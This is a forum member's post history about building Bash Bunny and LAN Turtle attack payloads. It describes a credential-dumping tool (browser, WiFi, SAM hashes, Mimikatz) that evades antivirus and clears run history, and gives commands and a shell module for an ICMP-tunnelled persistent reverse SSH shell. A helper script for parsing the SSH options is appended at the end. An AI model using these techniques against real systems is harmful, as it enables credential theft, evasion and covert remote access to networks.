qdba
Active Members
Posts: 87
Days Won: 2

Everything posted by qdba

  1. - Can you ping 172.16.64.1?
     - Try the attached payload.txt. If it goes to red, smbserver.py is missing. If not, ssh to the bunny while the purple LED blinks slow.
       1. Enter this command at the terminal:
            ps -ef | grep smb
          As a result there should be a line like
            root 741 1 3 01:00 ? 00:00:27 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch1
       2. Enter this command at the terminal:
            mount |grep udisk
          As a result there should be a line like
            /dev/nandf on /root/udisk type vfat (rw,relatime,fmask=0022,dmask=0022,codepage=cp437,iocharset=ascii,shortname=mixed,errors=continue)
     - Will the second powershell command fire up successfully? Check the cmd window (I switched it to B&W in the payload).
     - Have you tried it at a second computer?
     payload.txt
  2. My ideas coming with the next Version.....
     - parallelize Creds gathering with PS: while Bashbunny is waiting for Target finishing the scripts it can do some other nice work, i.e. nmap the target. (any other ideas?)
     - remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts)
     - put some version information into the sourcecode and the output file
     - rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox)
     - Maybe! If Target is in an AD Domain and Mimik@tz gives us some Domain Passwords, try to get some more information about the AD Domain
  3. Could you check that File and printer sharing is enabled in your Firewall.
  4. While Purple is blinking Slow, could you reach \\172.16.64.1\e with windows explorer?
  5. @LowValueTarget At the moment MS Defender and Avira Antivir don't detect it. But I'm sure in 1 or 2 days they will :- Feel free to obfuscate the code if you want. I won't publish some encoded or obfuscated code here in this forum. If I do so, I'm sure some Anti-Virus Tools will detect it in 1 or 2 days.
  6. DumpCreds 2.0
     Author: QDBA
     Version: Version 2.0.2
     Target: Windows

     Description
     Dumps the usernames & plaintext passwords from
       - Browsers (Chrome, IE, FireFox)
       - Wifi
       - SAM Hashes
       - Mimik@tz Dump
       - [new] Computer information (Hardware, Software list, Hotfixes, ProductKey, Users...)
     without use of
       - USB Storage (because USB Storage is mostly blocked by USBGuard or DriveLock)
       - Internet connection (because the Firewall ContentFilter blocks the download sites)

     Configuration
     None needed.

     Requirements
     Impacket must be installed. Install it from the tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer

     STATUS LED              Status
     ----------------------- --------------------------------------------------------------
     White                   Give drivers some time for installation
     Red Blink Fast          Impacket not found
     Red Blink Slow          Target did not acquire IP address
     Amber Blink Fast        Initialization
     Amber                   HID Stage
     Purple Blink Fast       Wait for IP coming up
     Purple Blink Slow       Wait for Handshake (SMBServer Coming up)
     Purple / Amber          Powershell scripts running
     RED                     Error in Powershell Scripts
     Green                   Finished

     Download
     https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0

     ToDo
       - parallelize Creds gathering with PS: while Bashbunny is waiting for Target to finish the script it can do some other nice work, i.e. nmap the target. (Not very useful at the moment, because I'm Admin on Target Host)
       - remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not possible at the moment
       - put some version information into the sourcecode and the output file
       - rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe!
       - If Target is in an AD Domain and Mimik@tz gives us some Passwords, try to get some more information about the AD Domain

     Credits to......
     https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1
     https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1
  7. qdba

    Violation of CoC

    Good Work, I had the same idea because I'm pentesting a company that has forbidden USB Storage and Internet access per Policy. They have a good firewall with content filter and only a few Internet pages are allowed. So you saved me a lot of time coding the stuff... Thank you ....
    One idea... .... the whole QUACK stuff takes a lot of time. To save attack time, put a lot of the QUACK code into the powershell code. I had done it with your CredDump Payload.
    https://github.com/qdba/bashbunny-payloads/tree/master/payloads/DumpCreds
    Only a suggestion. You do really good work anyway.
  8. qdba

    Violation of CoC

    Good stuff. Did some changes to your script like
      - Minimize Powershell windows
      - Dump WiFi creds
      - Clear Run History
    https://github.com/qdba/bashbunny-payloads/blob/master/payloads/BrowserCreds/payload.txt
  9. At the moment if you have ATTACKMODE RNDIS_ETHERNET STORAGE or ATTACKMODE RNDIS_ETHERNET HID the RNDIS Driver must be installed manually in windows. So this Combination is not really easy to use for attack vectors. My idea is:
     ATTACKMODE HID
     ....... ......start some scripts on windows >>>> windows script waits for the IP 172.16.64.1 coming up
     ........ ATTACKMODE RNDIS_ETHERNET ......
     ....... Script on windows detects the upcoming interface and goes on with work .......
     Theoretically it should work
  10. Yes, it's really bad that the driver must be installed manually if you have ATTACKMODE RNDIS_ETHERNET <STORAGE | HID>. While most companies block USB Storage devices, it would be nice if we had a server (impacket's smbserver.py or python SimpleHTTPServer) running on bash bunny and HID for downloading and running code with i.e. powershell.
  11. Hi
      Try
        /pentest/impacket/examples/smbserver.py tmp /tmp/ >> O.txt &
      With "&" the server runs in background mode so the script will move on.
  12. Hi,
      OK, it's an older thread, but I had the same problem a few days ago. So I did some investigation and solved it.
      The problem was that there is no input field for the port of the host the ssh connection is established to.
      The manual way....... works for me.

      On the SSH Host
      Start ptunnel at the host (IP: xxx.xxx.xxx.xxx) --> /usr/sbin/ptunnel -daemon /tmp/ptunnel.pid

      On LAN-Turtle
      ptunnel -p xxx.xxx.xxx.xxx -lp 8000 -da xxx.xxx.xxx.xxx -dp 22
      autossh -M 0 -i /root/.ssh/id_rsa -N -T -R 2222:localhost:22 user@localhost -p 8000
      ...... user@localhost -p 8000
      --> user is the ssh user on the host xxx.xxx.xxx.xxx
      --> -p 8000 is the port where ptunnel is waiting for the packets, sending them to xxx.xxx.xxx.xxx with ICMP

      I did some changes at the autossh module so you can configure them with the turtle menu:

        #!/bin/bash /usr/lib/turtle/turtle_module
        VERSION="1.2"
        DESCRIPTION="AutoSSH maintains persistent secure shells"
        CONF=/tmp/autossh.form

        # dialog(1) exit codes
        : ${DIALOG_OK=0}
        : ${DIALOG_CANCEL=1}
        : ${DIALOG_HELP=2}
        : ${DIALOG_EXTRA=3}
        : ${DIALOG_ITEM_HELP=4}
        : ${DIALOG_ESC=255}

        function start {
            # host part of the configured user@host (7th field of the uci ssh option string)
            autossh_host=$(uci show autossh.@autossh[0].ssh | awk '{print $7}' | sed 's/@/ /g' | awk '{print $2}')
            touch /root/.ssh/known_hosts
            if grep $autossh_host /root/.ssh/known_hosts; then
                /etc/init.d/autossh start
            else
                echo "$autossh_host not in known_hosts"
            fi
        }

        function stop {
            /etc/init.d/autossh stop
        }

        function status {
            if pgrep autossh > /dev/null; then echo "1"; else echo "0"; fi
        }

        function configure {
            if [ -s /etc/config/autossh ]
            then
                # fields of "-i /root/.ssh/id_rsa -N -T -R <remote>:localhost:<local> <user@host> -p <port>"
                autossh_host=$(uci show autossh.@autossh[0].ssh | awk '{print $7}')
                autossh_port=$(uci show autossh.@autossh[0].ssh | awk '{print $9}')
                autossh_remoteport=$(uci show autossh.@autossh[0].ssh | awk '{print $6}' | sed 's/:/ /g' | awk '{print $1}')
                autossh_localport=$(uci show autossh.@autossh[0].ssh | awk '{print $6}' | sed 's/:/ /g' | awk '{print $3}')
            else
                touch /etc/config/autossh
            fi

            dialog --ok-label "Submit" \
                --help-button \
                --title "AutoSSH Configuration" \
                --form "AutoSSH (Persistent Secure Shell)\n\n\
        User@Host: User and Host to establish the SSH tunnel\n\
        Port: Port of the Host to establish the SSH tunnel\n\
        Remote Port: Remote port to bind through the SSH tunnel\n\
        Local Port: Local port to bind tunnel (Default 22)\n \n" 16 60 4 \
                "User@Host:"   1 1 "$autossh_host"       1 14 48 0 \
                "Port:"        2 1 "$autossh_port"       2 14 48 0 \
                "Remote Port:" 3 1 "$autossh_remoteport" 3 14 48 0 \
                "Local Port:"  4 1 "$autossh_localport"  4 14 48 0 \
                2>$CONF

            return=$?
            case $return in
                $DIALOG_OK)
                    # the form writes one value per line to $CONF
                    cat $CONF | {
                        read -r autossh_host
                        read -r autossh_port
                        read -r autossh_remoteport
                        read -r autossh_localport
                        touch /etc/config/autossh
                        uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -N -T -R $autossh_remoteport:localhost:$autossh_localport $autossh_host -p $autossh_port"
                        uci commit autossh
                        rm $CONF
                    };;
                $DIALOG_CANCEL)
                    rm $CONF
                    clear
                    exit;;
                $DIALOG_HELP)
                    dialog --title "Help" \
                        --msgbox "\
        AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.\n \n\
        Host - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.\n \n\
        Port - The port number from which the remote server will bind.\n \n\
        Listen Port - The port number to which the remote port will bind.\n \n\
        Example: Per the defaults, the server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the remote host, and then from the remote host establishing an SSH connection to port 2222.\n \n\
        For a video walkthrough, please watch h**ps://www.youtube.com/watch?v=J798iStWLOM&index=1&list=PLAC30AB8C5D17FCB5 - Hak5 Explaining NAT Traversal with SSH proxies.\
        " 20 60
                    configure
                    ;;
                $DIALOG_ESC)
                    clear;;
            esac
        }

      Module Configuration:
      Module ptunnel:
        PTunnel Host: xxx.xxx.xxx.xxx
        Local Port: 8000
        Dst. Host: xxx.xxx.xxx.xxx
        Dst. Port: 22
      Module autossh:
        User@Host: user@localhost
        Port: 8000
        Remote Port: 2222
        Local Port: 22

      enjoy it.... QDBA
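The configure function in the module above reads the host, port and tunnel ports back out of the uci ssh option string by fixed awk field positions ($6, $7, $9), which silently returns the wrong values as soon as another option (for example -o ServerAliveInterval=30, or the -M 0 from the manual autossh command) is stored in that string. The following is an added example, not part of qdba's module or of the LAN Turtle firmware: it walks the option string argument by argument instead. It assumes the caller has already extracted the bare value of autossh.@autossh[0].ssh; SAMPLE below is a constructed value in the module's own format.

```shell
#!/bin/sh
# Added example (not from the LAN Turtle autossh module): extract a field from
# the autossh ssh option string by walking its arguments, so extra options do
# not shift the result the way fixed awk field numbers do.
# Usage: autossh_field "<ssh option string>" host|port|remoteport|localport
autossh_field() {
    local opts="$1" want="$2"
    local host="" port="22" remoteport="" localport="" spec=""
    # Re-split the option string on whitespace into $1 $2 ... (word splitting intended)
    set -- $opts
    while [ $# -gt 0 ]; do
        case "$1" in
            -p) port="$2"; shift ;;
            -R) spec="$2"
                # -R remoteport:localhost:localport; a leading bind address
                # ([addr:]port:host:hostport) is not handled here
                remoteport="${spec%%:*}"   # text before the first ':'
                localport="${spec##*:}"    # text after the last ':'
                shift ;;
            -M|-i|-o|-L|-D|-l|-b|-F) shift ;;  # options with a value we do not need
            -*) ;;                              # bare flags such as -N -T
            *)  host="$1" ;;                    # the positional user@host argument
        esac
        shift
    done
    case "$want" in
        host)       printf '%s\n' "$host" ;;
        port)       printf '%s\n' "$port" ;;
        remoteport) printf '%s\n' "$remoteport" ;;
        localport)  printf '%s\n' "$localport" ;;
        *)          return 1 ;;
    esac
}

# Constructed sample: the value the module stores in uci, plus a keepalive
# option that would move every field the module's awk pipeline relies on.
SAMPLE='-i /root/.ssh/id_rsa -o ServerAliveInterval=30 -N -T -R 2222:localhost:22 user@localhost -p 8000'

for f in host port remoteport localport; do
    printf '%s=%s\n' "$f" "$(autossh_field "$SAMPLE" "$f")"
done
```

When -p is absent the function reports ssh's default port 22, matching what the module's "Local Port (Default 22)" form text implies.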